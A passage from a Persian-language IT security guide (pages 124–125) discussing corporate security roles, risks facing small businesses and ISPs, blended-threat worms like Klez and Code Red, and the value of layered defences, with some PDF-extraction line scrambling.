ﻣﺘﻮﺳﻂ ﺑﺎﻳﺪ ﻣﺮﻭﺭﻱ ﻛﺎﻣﻞ ﺑﺮ ﻣﺄﻣﻮﺭﻳﺘﻬﺎ ،ﺍﻫﺪﺍﻑ ،ﺻـﻼﺣﻴﺘﻬﺎ ﻭ
ﻛﻪ ﻫﺮ ﻳﻚ ﺩﺭ ﻳﻚ ﺣﻮﺯﺓ ﺗﺠﺎﺭﻱ ﻳﺎ ﻓﻨﻲ ﻣﺘﺨﺼﺺ ﺍﺳﺖ .ﺍﻳﻦ ﻧﻘﺸﻬﺎ
ﻋﺒﺎﺭﺗﻨﺪ ﺍﺯ ﻣﻮﺍﺭﺩ ﺯﻳﺮ )ﻭﻟﻲ ﺑﻪ ﺁﻧﻬﺎ ﻣﺤﺪﻭﺩ ﻧﻤﻲﺷـﻮﻧﺪ( :ﻣـﺪﻳﺮ ﺍﺭﺷـﺪ ﺍﺟﺮﺍﻳـﻲ
) ،(CEOﻣــﺪﻳﺮ ﺍﺭﺷــﺪ ﺍﻣــﻮﺭ ﻣــﺎﻟﻲ ) ،(CFOﻣــﺪﻳﺮ ﺍﺭﺷــﺪ ﻓﻨــﺎﻭﺭﻱ
) ،(CTOﻣﺪﻳﺮ ﺍﺭﺷﺪ ﺍﻃﻼﻋﺎﺕ ) ،(CIOﻭ ﺑﺘﺎﺯﮔﻲ ﻣﺪﻳﺮ ﺍﺭﺷﺪ ﺍﻣﻨﻴـﺖ
) .(CSOﻫﻤﭽﻨﻴﻦ ﺩﺭ ﻳﻚ ﺳﺎﺯﻣﺎﻥ ﻣﻌﻤﻮﻟﻲ ﻳﻚ ﺳﻠﺴﻠﻪ ﻣﻮﻗﻌﻴﺘﻬـﺎﻱ
ﻗﺎﺋﻢﻣﻘﺎﻣﻲ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﺍﺯ ﻗﺒﻴﻞ ﻗﺎﺋﻢﻣﻘﺎﻡ ﺑﺎﺯﺍﺭﻳﺎﺑﻲ ،ﻓـﺮﻭﺵ ،ﻭ ﺗﻮﺳـﻌﺔ
ﺑﺎﺯﺭﮔﺎﻧﻲ .ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻳـﻦ ﺳـﺎﺧﺘﺎﺭ ﺭﺳـﻤﻲ ﺩﺭ ﺳـﺎﺯﻣﺎﻧﻬﺎﻱ
ﻛﻮﭼﻜﺘﺮ ﺿﺮﻭﺭﺗﻲ ﻧﺪﺍﺭﺩ )ﻳﺎ ﺍﻣﻜﺎﻥ ﺁﻥ ﻣﻴـﺴﺮ ﻧﻴـﺴﺖ( ،ﻣـﺸﺎﻫﺪﺓ ﭼﮕـﻮﻧﮕﻲ
ﺗﻘﺴﻴﻢ ﻣﺴﺌﻮﻟﻴﺘﻬﺎ ﺩﺭ ﺷﺮﻛﺘﻬﺎﻱ ﺑﺰﺭﮒ ﻭ ﺗﻮﺟـﻪ ﺑـﻪ ﺍﻓـﺰﺍﻳﺶ ﺍﻫﻤﻴـﺖ
CSOﻣﻲﺗﻮﺍﻧﺪ ﺑﺴﻴﺎﺭ ﻣﻔﻴﺪ ﺑﺎﺷﺪ.
ﺑﺨﺶ ﺳﻮﻡ
ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻛﻮﭼﻚ ﻭ ﻣﺘﻮﺳﻂ؛
ﻣﻮﺗﻮﺭﻫﺎﻱ ﺭﺷﺪ ﻭ ﺗﺮﻗﻲ
ﺑﺪﻭﻥ ﺑﺮﻧﺎﻣﺔ ﻛﻠﻲ ﺑﺮﺍﻱ ﺍﻳﺠﺎﺩ ﻳﻚ ﻣﺤﻴﻂ ﺍﻣـﻦ ﺑـﺮﺍﻱ ﻓﻨـﺎﻭﺭﻱ
ﺍﻃﻼﻋﺎﺕ ،ﻫﺮ ﻗﺴﻤﺖ ﻣﻤﻜﻦ ﺍﺳﺖ ﻳﻚ ﺭﺍﻫﻜﺎﺭ ﺑﺮﺍﻱ ﺑﺮﻗـﺮﺍﺭﻱ
ﺍﻣﻨﻴﺖ ﺗﻮﺳﻌﻪ ﺩﻫﺪ ﻛﻪ ﺍﺯ ﻣﺄﻣﻮﺭﻳﺘﻬﺎ ،ﺍﻫﺪﺍﻑ ،ﻭ ﻣﻘﺎﺻﺪ ﻋﻤﻠﻴـﺎﺗﻲ
ﻫﻤﺎﻥ ﻗﺴﻤﺖ ﻧﺎﺷﻲ ﺷﺪﻩ ﻭ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﻪ ﻫﻤـﺎﻥ ﺍﻧـﺪﺍﺯﻩ ﻛـﻪ
ﺑﺮﺍﻱ ﻳﻚ ﻗﺴﻤﺖ ﻣﻨﺎﺳﺐ ﺍﺳﺖ ﺑﺮﺍﻱ ﻗﺴﻤﺘﻬﺎﻱ ﺩﻳﮕﺮ ﭼﻨـﺪﺍﻥ
ﺑﻪ ﻛﺎﺭ ﻧﻴﺎﻳﺪ .ﺍﻳﻦ ﺭﺍﻫﻜﺎﺭﻫﺎﻱ ﻣﺨﺘﻠﻒ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺎﻋﺚ ﺷﻮﻧﺪ
ﺍﻣﻨﻴﺖ ﺩﺭ ﺑﻌﻀﻲ ﺣﻮﺯﻩﻫﺎ ﺑﻴﺶ ﺍﺯ ﺣﺪ ﻣﻮﺭﺩ ﻧﻴﺎﺯ ﻳﺎ ﻛﻤﺘـﺮ ﺍﺯ ﺣـﺪ
ﻣﻮﺭﺩ ﻧﻴﺎﺯ ﺗﺄﻣﻴﻦ ﺷﺪﻩ ﺑﺎﺷﺪ؛ ﺩﺭﺣﺎﻟﻴﻜﻪ ﻭﺟـﻮﺩ ﻧﻈـﺎﺭﺕ ﺍﺯ ﻃـﺮﻑ
ﻣﺪﻳﺮﻳﺖ ﺳﻄﻮﺡ ﺑﺎﻻ ﺗﻀﻤﻴﻦ ﺧﻮﺍﻫﺪ ﻛﺮﺩ ﻛـﻪ ﺗﺠـﺎﺭﺏ ﺍﻣﻨﻴﺘـﻲ
ﺑﮕﻮﻧﻪﺍﻱ ﺗﻨﻈﻴﻢ ﻣﻲﺷﻮﻧﺪ ﻛﻪ ﻣﺠﻤﻮﻋﺔ ﺳﺎﺯﻣﺎﻥ ﺑﺘﻮﺍﻧﺪ ﻋﻤﻠﻜـﺮﺩ
ﺑﻬﺘﺮﻱ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ .ﺳﻴﺎﺳﺘﻬﺎ ﻭ ﭘﻴﺎﺩﻩﺳﺎﺯﻳﻬﺎﻱ ﻓﻨﻲ ﻛـﻪ ﺟﻬـﺖ
ﻲ ﻛــﺎﺭﺁ ﺑــﺮﺍﻱ ﺳــﺎﺯﻣﺎﻥ ﻻﺯﻡ
ﺭﺍﻩﺍﻧــﺪﺍﺯﻱ ﻳــﻚ ﺳﻴــﺴﺘﻢ ﺍﻣﻨﻴﺘ ـ ﹺ
ﻣﻲﺑﺎﺷﻨﺪ ﻳﻚ ﺑﺨـﺶ ﺿـﺮﻭﺭﻱ ﻭ ﺍﺳﺎﺳـﻲ ﺍﻫـﺪﺍﻑ ﺗﺠـﺎﺭﻱ ﺭﺍ
ﺗﺸﻜﻴﻞ ﻣﻲﺩﻫﻨﺪ ﻛﻪ ﺩﺭ ﻫﺮ ﺳﺎﺯﻣﺎﻥ ﺑﺎﻳﺪ ﺑﻪ ﺁﻥ ﺑﻬﺎ ﺩﺍﺩ.
١٢٤
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﻃﻼﻋﺎﺗﻲ ﺧﻮﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ .ﺍﮔـﺮ ﺩﺭ ﺣـﻮﺯﻩﻫـﺎﻳﻲ
ﻓﻌﺎﻟﻴﺖ ﻣﻲﻛﻨﻨﺪ ﻛﻪ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﺑـﺮﺍﻱ ﺩﻳﮕـﺮﺍﻥ ﻣﺨـﺎﻃﺮﺍﺕ
ﻼ ﺣـﻮﺯﺓ ﻓﻨﺎﻭﺭﻳﻬـﺎﻱ ﺩﺭﺣـﺎﻝ
ﺍﻣﻨﻴﺘﻲ ﺩﺭ ﺑﺮ ﺩﺍﺷﺘﻪ ﺑﺎﺷـﺪ -ﻣـﺜ ﹰ
ﺗﻮﺳﻌﻪ -ﺑﺎﻳﺪ ﺗﻬﺪﻳﺪﻫﺎﻱ ﻣﺤﺘﻤﻞ ﻋﻠﻴﻪ ﺍﻣﻨﻴﺖ ﻣﺸﺘﺮﻳﺎﻥ ﺧﻮﺩ ﺭﺍ
ﭘﻴﺶﺑﻴﻨﻲ ﻛﻨﻨﺪ ﻭ ﻃﺮﺣﻬﺎﻳﻲ ﺑﺮﺍﻱ ﻛـﺎﻫﺶ ﺗـﺄﺛﻴﺮ ﺁﻧﻬـﺎ ﺗـﺪﻭﻳﻦ
ﻧﻤﺎﻳﻨﺪ .ﺍﮔﺮ ﺩﺭ ﺣﻮﺯﻩﻫﺎﻳﻲ ﻛﺎﺭ ﻣﻲﻛﻨﻨﺪ ﻛﻪ ﺑﻪ ﻫﺮ ﻧﺤﻮ ﺑﻪ ﺍﻣﻨﻴﺖ
ﺩﻭﻟﺖ ﻣﺮﺑﻮﻁ ﻣـﻲﺷـﻮﺩ -ﻣﺜـﻞ ﺍﺭﺍﺋـﻪ ﻣﺤـﺼﻮﻻﺕ ﻭ ﺧـﺪﻣﺎﺕ
ﺍﺭﺗﺒﺎﻃﺎﺕ ﻣﺨﺎﺑﺮﺍﺗﻲ -ﺑﺎﻳﺪ ﻣﺘﻮﺟﻪ ﺑﺎﺷﻨﺪ ﻛـﻪ ﺩﺭ ﭼـﻪ ﺯﻣـﺎﻧﻲ ﻭ
ﭼﮕﻮﻧﻪ ﻣﺴﺌﻮﻟﻴﺖ ﻗﺎﻧﻮﻧﻲ ﭘﺎﻳﺒﻨﺪﻱ ﺑﻪ ﺍﺣﻜـﺎﻡ ﺩﻭﻟﺘـﻲ ﺑـﺮ ﻋﻬـﺪﺓ
ﺁﻧﻬﺎﺳﺖ .ﻳﻚ ﺍﺭﺍﺋﻪﻛﻨﻨﺪﺓ ﺳﺮﻭﻳﺲ ﺍﻳﻨﺘﺮﻧـﺖ ) ١٠(ISPﻧﻤﻮﻧـﻪﺍﻱ
ﺍﺳﺖ ﺍﺯ ﺷﺮﻛﺘﻬﺎﻳﻲ ﻛﻪ ﺑﺎ ﻫﺮ ﺩﻭ ﻧﻮﻉ ﻣﺨﺎﻃﺮﻩ ﻣﻮﺍﺟﻪ ﺍﺳـﺖ .ﺑـﺎ
ﺍﺗﺼﺎﻝ ﻣﺸﺘﺮﻱ ﺑﻪ ﺍﻳﻨﺘﺮﻧﺖ ،ﺑﺮﺍﻱ ﺩﺍﺩﻩﻫﺎ ﻭ ﺗﺠﻬﻴـﺰﺍﺕ ﻣـﺸﺘﺮﻱ
ﻣﺨﺎﻃﺮﺍﺕ ﺍﻣﻨﻴﺘﻲ ﺑﻮﺟﻮﺩ ﻣﻲﺁﻳﺪ ،ﻭ ﺑﺎ ﻓﺮﺍﻫﻢ ﻛـﺮﺩﻥ ﻣﺤﺘﻮﻳـﺎﺕ
ﺩﻳﺠﻴﺘﺎﻟﻲ ﻭ ﺍﺑﺰﺍﺭ ﺍﺭﺗﺒﺎﻃﻲ ISP ،ﺩﺭ ﻣﻌﺮﺽ ﺍﺣﻜـﺎﻡ ﻭ ﻣﻘـﺮﺭﺍﺕ
ﻛﺸﻮﺭﻱ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﺩ .ﺍﮔﺮ ﻛﺴﻲ ﻗﺎﺑﻠﻴﺖ ﺗﺠﺎﺭﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺭﺍ
ﻧﻴﺰ ﺑﻪ ﺍﻳﻦ ﺧﺪﻣﺎﺕ ﺑﻴﺎﻓﺰﺍﻳﺪ ،ﺗﻬﺪﻳﺪﺍﺕ ﺑﺎﻟﻘﻮﻩ ﻭ ﻛﺴﺐ ﺍﻃﻤﻴﻨـﺎﻥ
ﺍﺯ ﭘﺎﻳﺒﻨﺪﻱ ﺑﻪ ﺗﻌﻬﺪﺍﺕ ،ﺗﺒﺪﻳﻞ ﺑـﻪ ﻣـﺸﻜﻼﺗﻲ ﺑـﺴﻴﺎﺭ ﻋﻈـﻴﻢ ﻭ
ﺍﺳﺎﺳﻲ ﻣﻲﺷﻮﻧﺪ.
ﺧﻄﺮﻫﺎﻱ ﺗﻬﺪﻳﺪﺍﺕ ﭼﻨﺪﮔﺎﻧﻪ
ﻱ ﭼﻨـﺪ ﻣﻨﺒـﻊ ﻣﻮﺛـﻖ ،ﻳـﻚ ﺭﻭﻧـﺪ ﺻـﻌﻮﺩﻱ ﺩﺭ
ﺩﺍﺩﻩﻫﺎﻱ ﺁﻣـﺎﺭ ﹺ
ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺁﻟﻮﺩﻩ ﺑﺮﺍﻱ ﺩﺳﺘﻴﺎﺑﻲ ﺑﻪ ﺍﻫﺪﺍﻑ ﺟﻨـﺎﻳﻲ ﺭﺍ
ﻧﺸﺎﻥ ﻣﻲﺩﻫﺪ .ﺩﺭ ﺳﺎﻝ ۲۰۰۲ﮔﺰﺍﺭﺷـﺎﺕ ﻣﺘﻌـﺪﺩﻱ ﺑـﻪ ﭼﻨـﻴﻦ
ﻣﻮﺿﻮﻋﺎﺗﻲ ﻣﺮﺑﻮﻁ ﺑﻮﺩ :ﺳـﺮﻗﺖ ﻫﻮﻳـﺖ ﺑـﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﺑﺮﻧﺎﻣـﺔ
ﺁﻟﻮﺩﻩ ،ﺗﻐﻴﻴﺮ ﺷﻜﻞ ﭘﺎﻳﮕﺎﻫﻬـﺎﻱ ﻭﺏ ﺑـﺎ ﺍﻧﮕﻴـﺰﻩﻫـﺎﻱ ﺳﻴﺎﺳـﻲ،
ﺣﻤﻼﺕ ﺗﻮﺯﻳﻊﺷﺪﺓ ﺗﺨﺮﻳﺐ ﺳﺮﻭﻳﺲ ) ١١(DDoSﻋﻠﻴـﻪ ﺍﻫـﺪﺍﻑ
ﺗﻌﻴﻴﻦﺷﺪﺓ ﺳﺎﺯﻣﺎﻧﻲ ،ﻭ ﻣﻮﺍﺭﺩ ﻣﺸﺎﺑﻪ ﺩﻳﮕﺮ.
ﺑﻌﻼﻭﻩ ،ﮔﺴﺘﺮﺩﮔﻲ ﺗﻬﺪﻳـﺪﺍﺕ ﭼﻨـﺪﻭﺟﻬﻲ ١٢ﺩﺭ ﺍﻳﻨﺘﺮﻧـﺖ ﺑـﺮﺍﻱ
ﻫﻤﻪ ﻣﺨﺎﻃﺮﺍﺕ ﺟﺪﻱ ﺑﻮﺟﻮﺩ ﻣﻲﺁﻭﺭﺩ .ﺍﻳﻦ ﻣﺨﺎﻃﺮﺍﺕ ﺑﻪ ﺣـﻮﺯﺓ
ﺧﺎﺻﻲ ﺗﻌﻠﻖ ﻧﺪﺍﺭﻧﺪ ﻭﻟﻲ ﺗﻤﺎﻡ ﺷﺒﻜﺔ ﺟﻬﺎﻧﻲ ﺭﺍ ﺗﻬﺪﻳﺪ ﻣﻲﻛﻨﻨـﺪ.
ﺑــﺮﺍﻱ ﻣﺜــﺎﻝ ﻛــﺮﻡ Klezﺑــﺎ ﺧــﺼﻮﺻﻴﺎﺗﻲ ﺑــﻪ ﻧﮕــﺎﺭﺵ
ﺩﺭﺁﻣﺪﻩ ﻛﻪ ﺑﺮ ﺍﺳﺎﺱ ﺁﻥ ﺻﺎﺣﺒﻨﻈﺮﺍﻥ ﻣﻌﺘﻘﺪﻧﺪ ﻳﺎ ﺩﺭ ﭼـﻴﻦ ﻭ ﻳـﺎ
ﺩﺭ ﻫﻨﮓﻛﻨﮓ ﻧﻮﺷﺘﻪ ﺷﺪﻩ ﺍﺳـﺖ .ﺩﺭﺣـﺎﻝ ﺣﺎﺿـﺮ ﻛـﺸﻮﺭﻫﺎﻱ
ﺁﺳﻴﺎﻳﻲ ﺑﻄﻮﺭ ﻓﺰﺍﻳﻨـﺪﻩﺍﻱ ﺍﺯ ﺭﺍﻳﺎﻧـﻪﻫـﺎﻱ ﻣﺘـﺼﻞ ﺑـﻪ ﺍﻳﻨﺘﺮﻧـﺖ
ﺑﻬﺮﻩﺑﺮﺩﺍﺭﻱ ﻣـﻲﻛﻨﻨـﺪ .ﻣﺘﺄﺳـﻔﺎﻧﻪ ﺑـﺴﻴﺎﺭﻱ ﺍﺯ ﺍﻳـﻦ ﺭﺍﻳﺎﻧـﻪﻫـﺎ
Internet Service Provider
Distributed Denial of Service Attack
Blended Threats
10
11
12
ﺑﻲﺣﻔﺎﻅ ﻫﺴﺘﻨﺪ ﻭ ﻛﺎﺭﺑﺮﺍﻥ ﺁﻧﻬـﺎ ﻧﻴـﺰ ﺍﺯ ﺍﺻـﻮﻝ ﺍﻭﻟﻴـﺔ ﺍﺳـﺘﻔﺎﺩﺓ
ﺍﻳﻤﻦ ﺍﺯ ﺭﺍﻳﺎﻧﻪﻫﺎ ﻧﺎﺁﮔﺎﻫﻨﺪ .ﺩﺭﻧﺘﻴﺠﻪ ﺍﺣﺘﻤﺎﻝ ﻣﻲﺭﻭﺩ ﻣﻨﺎﻃﻘﻲ ﻛﻪ
ﺍﺯ ﺭﺷﺪ ﻓﻨﻲ ﺑﺎﻻﻳﻲ ﺑﺮﺧﻮﺭﺩﺍﺭﻧﺪ -ﻣﺜﻞ ﭼﻴﻦ -ﺑﺎ ﭘﺮﺍﻛﻨﺪﻩﺷـﺪﻥ
ﻭﻳﺮﻭﺳــﻬﺎ ،ﻛﺮﻣﻬــﺎ ،ﺗﺮﺍﻭﺍﻫــﺎ ،ﻭ ﺗﻬﺪﻳــﺪﻫﺎﻱ ﭼﻨــﺪﻭﺟﻬﻲ ﻛــﻪ
ﺁﻣﻴﺨﺘﻪﺍﻱ ﺍﺯ ﻫﻤﺔ ﺍﻳﻦ ﻋﻮﺍﻣﻞ ﻫﺴﺘﻨﺪ ﻣـﻮﺭﺩ ﺣﻤﻠـﺔ ﻣﻬـﺎﺟﻤﻴﻦ
ﺳﺮﺍﺳﺮ ﺟﻬﺎﻥ ﻗﺮﺍﺭ ﺑﮕﻴﺮﻧﺪ.
ﺍﺑﺰﺍﺭﻫﺎﻱ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﺣﺎﻝ ﺣﺎﺿﺮ ﻳـﻚ ﻃﻴـﻒ ﺍﺯ ﺣﻔﺎﻇﺘﻬـﺎ ﺭﺍ ﺩﺭ
ﻣﻘﺎﺑﻞ ﺑﺮﻧﺎﻣﺔ ﺁﻟﻮﺩﻩ ﺍﻳﺠﺎﺩ ﻣﻲﻛﻨﻨﺪ ،ﺍﻣﺎ ﺍﺯ ﺩﻓﺎﻉ ﻛﺎﻣﻞ ﺩﺭ ﻣﻘﺎﺑـﻞ
ﻫﻤﺔ ﺍﹶﺷﻜﺎﻝ ﺣﻤﻼﺕ ،ﻧـﺎﺗﻮﺍﻥ ﻫـﺴﺘﻨﺪ .ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﻳـﻚ ﻃـﺮﺡ
ﺩﻓﺎﻋﻲ ﭼﻨﺪﻻﻳﻪ ،ﻫﻢ ﺍﺯ ﻟﺤـﺎﻅ ﻓﻨـﻲ ﻭ ﻫـﻢ ﺍﺯ ﻟﺤـﺎﻅ ﺍﻧـﺴﺎﻧﻲ
ﻣﺨﺎﻃﺮﺓ ﺑﺮﻭﺯ ﺭﺧﺪﺍﺩﻫﺎﻱ ﺍﻣﻨﻴﺘـﻲ ﺑﻮﺳـﻴﻠﺔ ﺑﺮﻧﺎﻣـﺔ ﺁﻟـﻮﺩﻩ ﺭﺍ ﺑـﻪ
ﺷﺪﺕ ﻛﺎﻫﺶ ﻣﻲﺩﻫﺪ -ﻫﺮﭼﻨﺪ ﺑﺎﺯ ﻫﻢ ﺁﻧﺮﺍ ﺍﺯ ﺑـﻴﻦ ﻧﻤـﻲﺑـﺮﺩ.
ﺗﻬﺪﻳﺪﺍﺕ ﭼﻨﺪﻭﺟﻬﻲ ﻣﺜﻞ ،Klez ،Slammer ،Code Red
ﻭ Bugbearﻣـﻲﺗﻮﺍﻧﻨـﺪ ﺷــﺒﻜﻪﻫـﺎﻱ ﺭﺍﻳﺎﻧـﻪﺍﻱ ﺭﺍ ﻣــﻮﺭﺩ ﺁﺯﺍﺭ
ﻱ ﺧﻮﺩ ﺁﺛﺎﺭ ﻣﺨﺮﺏ
ﺩﺍﺋﻤﻲ ﻗﺮﺍﺭ ﺩﻫﻨﺪ .ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻛﺮﻣﻬﺎ ﺑﻪ ﺧﻮﺩ ﹺ
ﻧﺪﺍﺭﻧﺪ ﺍﻣﺎ ﺩﺭ ﺳﻴـﺴﺘﻢ ﺩﺍﻣﻬـﺎﻳﻲ ﻧـﺼﺐ ﻣـﻲﻛﻨﻨـﺪ ﻛـﻪ ﺑﺎﻋـﺚ
ﻣﻲﺷﻮﺩ ﺩﺳﺘﺮﺳﻲ ﺍﻓﺮﺍﺩﻱ ﻛﻪ ﺑﺎ ﺁﻥ ﺩﺍﻣﻬﺎ ﺁﺷﻨﺎ ﻫﺴﺘﻨﺪ ﺑﻪ ﺷﺒﻜﻪ
ﺳﺮﻳﻊ ﻭ ﺁﺳﺎﻥ ﮔﺮﺩﺩ.
ﺟﺪﺍﻱ ﺍﺯ ﺍﻳﻦ ﻣﻄﻠﺐ ،ﻛﺮﻣﻬﺎ ﺍﺯ ﺑﻌﻀﻲ ﺟﻬﺎﺕ ﺩﺭ ﻧـﺎﺗﻮﺍﻥ ﻛـﺮﺩﻥ
ﺳﻴﺴﺘﻤﻬﺎ ﻣﺆﺛﺮﺗﺮ ﻫﺴﺘﻨﺪ؛ ﭼﺮﺍﻛﻪ ﻗﺎﺩﺭﻧﺪ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻱ ﻣﻮﺟﻮﺩ
ﺩﺭ ﻧــﺮﻡﺍﻓﺰﺍﺭﻫــﺎﻱ ﺭﺍﻳــﺞ -ﻣﺜــﻞ ﻣﺮﻭﺭﮔﺮﻫــﺎﻱ ﻭﺏ -ﺭﺍ ﻣــﻮﺭﺩ
ﺑﻬﺮﻩﺑﺮﺩﺍﺭﻱ ﻗﺮﺍﺭ ﺩﻫﻨﺪ.
ﺩﺭ ﻣﺤﻴﻄﻬﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻛﻪ ﭼﻨﻴﻦ ﺧـﺼﻮﺻﻴﺎﺗﻲ ﺩﺭ ﺁﻧﻬـﺎ ﻭﺟـﻮﺩ
ﺩﺍﺭﺩ ،ﻛﺎﺭﺑﺮﺍﻥ ﺑﺎﻳﺪ ﺩﺭ ﻣﻮﺭﺩ ﻣﺨـﺎﻃﺮﺍﺕ ﻣﻮﺟـﻮﺩ ﻭ ﻧﺤـﻮﺓ ﺑـﺮﻭﺯ
ﻭﺍﻛﻨﺶ ﻣﻨﺎﺳـﺐ ﺩﺭ ﻣﻮﻗﻌﻴﺘﻬـﺎﻱ ﺍﻧﻔـﺮﺍﺩﻱ ،ﺍﻃﻼﻋـﺎﺕ ﺧـﻮﺩ ﺭﺍ
ﺍﻓﺰﺍﻳﺶ ﺩﻫﻨﺪ .ﻫﻨﮕﺎﻣﻴﻜﻪ ﺍﺳﺘﻔﺎﺩﺓ ﺍﻳﻤﻦ ﺍﺯ ﺭﺍﻳﺎﻧﻪ ﺗﻤـﺮﻳﻦ ﺷـﻮﺩ،
ﻣﺨﺎﻃﺮﺓ ﻳﻚ ﺣﻤﻠﻪ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻪ ﻣﻴﺰﺍﻥ ﻗﺎﺑـﻞ ﺗـﻮﺟﻬﻲ ﻛـﺎﻫﺶ
ﻳﺎﺑﺪ ،ﺍﻣﺎ ﻣﺠﺪﺩﹰﺍ ﺗﺄﻛﻴﺪ ﻣﻲﺷﻮﺩ ﻛﻪ ﻫﺮﮔﺰ ﻧﻤﻲﺗﻮﺍﻥ ﺁﻧﺮﺍ ﺑﻪ ﺻـﻔﺮ
ﺭﺳﺎﻧﺪ .ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﺗﻬﺪﻳـﺪ ﺧﺮﺍﺑﻜـﺎﺭﻱ ﻋﻤـﺪﻱ ﺩﺭ ﺳﻴـﺴﺘﻤﻬﺎﻱ
ﺭﺍﻳﺎﻧﻪﺍﻱ ﺑﺮﺍﻱ ﺳﺎﺯﻣﺎﻧﻬﺎ ﺑﺴﻴﺎﺭ ﺯﻳﺎﺩ ﺍﺳـﺖ ،ﺑﺮﺭﺳـﻲ ﻣﺨـﺎﻃﺮﺍﺕ
ﺍﻣﻨﻴــﺖ ﺍﻧﻔــﺮﺍﺩﻱ ﻭ ﺗﺮﺍﻛﻨــﺸﻬﺎﻱ ﻣــﺎﻟﻲ ﻭ ﭼﺎﻟــﺸﻬﺎﻱ ﺟﺪﻳــﺪ
ﻱ ﺑﻲﺳﻴﻢ ﺑﺴﻴﺎﺭ ﺣـﺎﺋﺰ ﺍﻫﻤﻴـﺖ
ﺑﻮﺟﻮﺩﺁﻣﺪﻩ ﺩﺭ ﺑﺴﺘﺮﻫﺎﻱ ﺭﺍﻳﺎﻧﻪﺍ ﹺ
ﺍﺳﺖ.
١٢٥
ﺑﺨﺶ ﺳﻮﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ
ﻣﺰﺍﻳﺎﻱ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﻣﺪﻳﺮﻳﺖ ﺁﻥ
ﻋﻠﻴﺮﻏﻢ ﭼﺎﻟﺸﻬﺎﻱ ﻣﻮﺟـﻮﺩ ،ﻣـﺪﻳﺮﺍﻥ ﻭ ﻛﺎﺭﺁﻓﺮﻳﻨـﺎﻥ ﺑﺨـﺸﻬﺎﻱ
ﺩﻭﻟﺘــﻲ ﻭ ﺧــﺼﻮﺻﻲ ﺩﺭ ﻛــﺸﻮﺭﻫﺎﻱ ﺩﺭﺣــﺎﻝ ﺗﻮﺳــﻌﻪ ﺑــﻪ
ﺳﺮﻣﺎﻳﻪﮔﺬﺍﺭﻱ ﺭﻭﻱ ﻓﻨﺎﻭﺭﻱ ﻧﻮﻳﻦ ﺍﻃﻼﻋﺎﺕ ﻭ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺷـﺎﻣﻞ
ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ،ﺍﻳﻨﺘﺮﻧﺖ ،ﺍﺭﺗﺒﺎﻃﺎﺕ ﺑﻲﺳﻴﻢ ،ﻭ ﻧﺮﻡﺍﻓﺰﺍﺭﻫـﺎﻱ
ﺗﺠﺎﺭﻱ ﻣﺸﻐﻮﻟﻨﺪ ﺗﺎ ﺑﻪ ﺍﻧﺠﺎﻡ ﻛﺎﺭﻫﺎﻱ ﺭﻭﺯﻣﺮﺓ ﺧﻮﺩ ﻛﻤﻚ ﻛـﺮﺩﻩ
ﺑﺎﺷﻨﺪ .ﻣﺰﺍﻳﺎﻱ ﻣﺨﺘﻠﻒ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻳـﻦ ﻣﺤـﺼﻮﻻﺕ ﻭ ﺧـﺪﻣﺎﺕ
ﺟﺪﻳﺪ -ﻣﺜﻞ ﻛﺎﺭﺁﻳﻲ ﻭ ﺻـﺮﻓﻪﺟـﻮﻳﻲ ﺩﺭ ﻫﺰﻳﻨـﻪﻫـﺎ -ﻭﺍﺿـﺢ
ﻫﺴﺘﻨﺪ:
.۲
ﺗﻮﺍﻧﺎﻳﻲ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺣﺠﻢ ﺯﻳﺎﺩ ﺍﻃﻼﻋﺎﺕ ﺑﺎ ﺳﺮﻋﺖ ﺯﻳﺎﺩ
ﻭ ﺑﺼﻮﺭﺕ ﺍﺭﺯﺍﻧﻘﻴﻤﺖ ﺗﻘﻮﻳﺖ ﻣﻲﺷﻮﺩ؛
.۳
ﻭﺳﻴﻠﻪﺍﻱ ﺑﺮﺍﻱ ﺗﻮﺳﻌﺔ ﻗﺎﺑﻠﻴﺘﻬـﺎﻱ ﺣﻔﺎﻇـﺖ ﺍﺯ ﺩﺍﺩﻩﻫـﺎ ﻭ
ﻣﺪﻳﺮﻳﺘﻲ ﻓﺮﺍﻫﻢ ﻣﻲﮔﺮﺩﺩ ﻛﻪ ﻣﻨﺠﺮ ﺑﻪ ﻧﮕﻬﺪﺍﺭﻱ ﺑﻬﺘﺮ ﺍﺯ
ﺍﻗﻼﻡ ﺩﺍﺩﻩ ﺑـﺮﺍﻱ ﻣـﺪﻳﺮﺍﻥ ﻣـﺎﻟﻲ ،ﺗﺤﻠﻴـﻞ ﺑﻬﺘـﺮ ﺭﻓﺘـﺎﺭ
